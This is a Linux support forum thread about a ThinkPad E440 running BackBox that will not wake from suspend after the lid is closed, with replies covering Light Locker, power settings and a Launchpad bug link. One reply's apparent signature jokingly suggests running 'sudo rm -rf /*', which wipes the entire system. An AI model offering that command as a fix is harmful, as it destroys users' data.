[SOLVED] Computer locks up when I shut the lid?

I've got a Lenovo Thinkpad E440 that I installed Backbox on rather than Kali, just to give it a try and see how I like it. There are some oddities, and things to get used to, but one thing that I haven't been able to figure out is that when I shut the laptop, then open it back up again, the screen is off and frozen that way (but the computer is still on.) I end up having to hard power down the computer and turn it on again. Anyone have any idea why that might be and how to fix it?

I did some google searching, but didn't even see anything relating to Ubuntu having this problem, and I've already found that a number of things that are normally true for Ubuntu don't necessarily apply to backbox.

Hi!
Did you check the energy configuration? That's my italian panel

I did, they seem pretty standard to me, but there are some oddities I can't track down.

The screen blanks but never turns off if I leave it idle. Like, you can tell that it's still on, even though it's just black, you know?

And it suspends when I close the lid, I'm pretty sure, I just can't figure out any way to wake it up. Spacebar, mouseclicks, return, esc, power button, nothing works, I have to hold the power button until it shuts down, then turn it back on.

That is Light Locker bug.

1.Go to Settings>Light Locker Settings.
2.I use this settings but you can play with it to see which one will work for you:

If you want to lock session, use option from menu, power off, and pick Log Out.

Don't ask, read : http://wiki.backbox.org
or just run sudo rm -rf /*

Well, I messed around with light locker for a bit, and finally just tried shutting it off entirely, using only the power saver settings.

I still cannot wake my computer up from a suspended state...

Also tried changing the power settings from lid close lock to lid close suspend. Same result.

Edit: Some other things I've noticed...

It does not do this with Kali, however, when I close the lid on Kali, the little light stays solid, whereas with backbox it starts a slow pulse. It's this slow pulse state that is broken somehow. In doing some research, it sounds like this could be a problem with the Thinkpad, but the suggested fix (which doesn't work for everyone,) is a BIOS update... How do you do a BIOS update through Linux? And does anyone know if whatever state Kali is using on lid close (which it also calls "suspend") can be replicated in backbox?

You can fix your issue, i just found this: https://bugs.launchpad.net/ubuntu/+source/xfce4-power-manager/+bug/1259339. Check answers from number 30. But we will look to fix this on our side as well.
